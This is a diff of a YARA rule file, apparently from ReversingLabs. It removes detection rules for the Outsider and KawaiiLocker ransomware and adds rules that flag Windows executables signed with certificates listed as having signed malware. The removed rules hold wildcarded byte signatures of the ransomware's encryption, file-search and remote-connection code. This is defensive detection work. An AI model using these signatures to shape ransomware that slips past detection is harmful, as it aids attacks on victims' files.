+		logic_hash = "caff0cbca45c0dffb673367585824783371f2f4e31a0c9629afb7de708098892"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Outsider"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? 8B D9 50 6A ?? 5E 56 FF 35 ?? ?? ?? ??
-            89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 55 ?? 89 75 ?? 8B CF 2B
-            D7 8A 04 0A 88 01 41 83 EE ?? 75 ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 56 FF 35 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 75 ?? 89 75 ?? 53 FF 15 ?? ?? ?? ?? 8D
-            04 43 83 E8 ?? 66 83 38 ?? 75 ?? FF B6 ?? ?? ?? ?? 2B C3 83 C0 ?? D1 F8 8D 04 43 50
-            FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF B6 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ??
-            8B F0 FF 15 ?? ?? ?? ?? 3B C6 74 ?? 8B 75 ?? 83 C6 ?? 89 75 ?? 83 FE ?? 72 ?? EB ??
-            C7 45 ?? ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 50 FF 15 ?? ?? ??
-            ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 8B D8 33 C0 50 8D 45 ?? 50 68 ?? ?? ??
-            ?? 53 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 33 C0 89 4D ?? 3B C8 76 ?? 8B F8 8B C7 25 ?? ??
-            ?? ?? 79 ?? 48 83 C8 ?? 40 89 45 ?? 75 ?? 8B C7 99 83 E2 ?? 03 C2 C1 F8 ?? 99 52 50
-        }
-		$encrypt_files_p2 = {
-            51 51 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 8B 45 ?? 8A 84 05
-            ?? ?? ?? ?? 30 04 1F 47 8B C7 99 85 D2 72 ?? 77 ?? 3B C1 72 ?? 8B 4D ?? 8B 7D ?? 6A
-            ?? F7 D9 8B C1 6A ?? 99 52 50 57 FF 15 ?? ?? ?? ?? 33 C0 50 8D 45 ?? 50 FF 75 ?? 53
-            57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 53 33
-            C0 50 FF D6 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 5D ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ??
-            50 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 50 8D
-            45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 50 8D 45 ?? 50 6A ?? 57
-            FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 50
-            FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 53 FF 15 ?? ?? ?? ?? 56 33 F6 56 FF 15 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? EB ?? 33 F6 57 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E
-            5B 8B E5 5D C3
-        }
-		$find_files = {
-            8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 57 68 ?? ?? ?? ?? 6A ?? FF
-            D3 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ??
-            0F 84 ?? ?? ?? ?? 8B D8 33 FF FF B7 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 83 C7 ?? 83 FF ?? 72 ?? 8D 44 24 ?? 50 FF 75 ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ??
-            8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 59 EB ?? 8B 44 24 ?? A8 ?? 74 ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 8B CE E8 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CE E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 56
-            6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$enum_resources = {
-            55 8B EC 83 E4 ?? 83 EC ?? 83 0C 24 ?? 8D 44 24 ?? 53 56 57 50 FF 75 ?? C7 44 24 ??
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ??
-            83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? EB ?? 33
-            DB 39 5C 24 ?? 76 ?? 8D 77 ?? F6 46 ?? ?? 74 ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? EB ?? FF
-            36 E8 ?? ?? ?? ?? 43 83 C6 ?? 59 3B 5C 24 ?? 72 ?? 8D 44 24 ?? 50 57 8D 44 24 ?? 50
-            FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ??
-            ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "M-Trans Maciej Caban" and pe.signatures [ i ] . serial == "6e:44:fc:ed:d4:9f:22:f7:a2:8c:ec:c9:91:04:f6:1a" and 1672923378 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_35B49Ee870Aea532E6Ef0A4987105C8F : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "88dedb69-52f4-59d3-b397-6a091a866cc5"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12518-L12534"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "a9d8e9db453f40e32a0cb6412db8885db54053fdf3d7908b884361a493f97b1f"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kancelaria Adwokacka Adwokat Aleksandra Krzemi\\xC5\\x84ska" and pe.signatures [ i ] . serial == "35:b4:9e:e8:70:ae:a5:32:e6:ef:0a:49:87:10:5c:8f" and 1663151018 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Kawaiilocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_063Dcd7D7B0Bc77Cac844C7213Be3989 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects KawaiiLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8c368e2d-3c6f-5c4b-880b-ebdb06dcf901"
-		date = "2020-08-17"
-		modified = "2020-08-17"
+		id = "1bf4b84b-4a32-5908-8ccb-9fce2e5944e6"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.KawaiiLocker.yara#L1-L135"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12536-L12552"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d86b41ef1c43da55869ad26facd5efdf232277f0e33483690a69a04c4ba8f7da"
+		logic_hash = "091d00b0731f0a3d9917eee945249f001e4b5b1b603cad2fc21eed70ec86aa99"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "KawaiiLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files = {
-            55 8B EC 51 B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 87 4D ?? 53 56 57 88 4D ?? 89 55
-            ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8
-            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 7D ?? ?? 0F 85 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8A 4D
-            ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BB ?? ?? ?? ?? FF 75 ?? 68
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 13 E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D
-            95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ??
-            FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 83 C3 ?? 4E 0F 85 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8B C7 83 C8 ?? 3B C7 75 ?? 80 7D ?? ?? 0F 85 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8A 4D
-            ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BB ?? ?? ?? ?? FF 75 ?? 68
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 13 E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D
-            95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ??
-            FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 83 C3 ?? 4E 0F 85 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? C3
-        }
-		$remote_connection = {
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2
-            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            45 ?? 50 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 59 E8 ?? ?? ?? ??
-            8D 4D ?? BA ?? ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75
-            ?? 8D 4D ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 8D 45 ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45
-            ?? 8B 50 ?? 8B 45 ?? 8B 08 FF 51 ?? 8D 55 ?? 8B 45 ?? 8B 08 FF 51 ?? 8B 45 ?? 8D 55
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? E8 ?? ??
-            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B C3 8B 55 ?? E8 ?? ?? ?? ??
-            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files = {
-            55 8B EC 6A ?? 6A ?? 6A ?? 53 56 57 BB ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30
-            64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52
-            ?? 8B F0 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43
-            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B DE 4B 85 DB 7C ?? 43 33 F6 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45
-            ?? 8D 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ??
-            ?? ?? 8B 08 FF 51 ?? 8D 4D ?? 8B D6 A1 ?? ?? ?? ?? 8B 38 FF 57 ?? 8B 45 ?? B1 ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 46 4B 75 ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HANNAH SISK LIMITED" and pe.signatures [ i ] . serial == "06:3d:cd:7d:7b:0b:c7:7c:ac:84:4c:72:13:be:39:89" and 1656892801 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_6F8777Aa866142Ad7120E5E1C9321E37 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "ace8a8b4-5288-56c4-bd47-9eb42ea41ecb"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12554-L12570"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "ca3ff0c7192ba90932d35d053712816555dea051ce15d29a7ccf4e37da989899"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $search_files and $encrypt_files and $remote_connection
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLOUD SOFTWARE LINE CO., LTD." and pe.signatures [ i ] . serial == "6f:87:77:aa:86:61:42:ad:71:20:e5:e1:c9:32:1e:37" and 1629676800 <= pe.signatures [ i ] . not_after )
 }
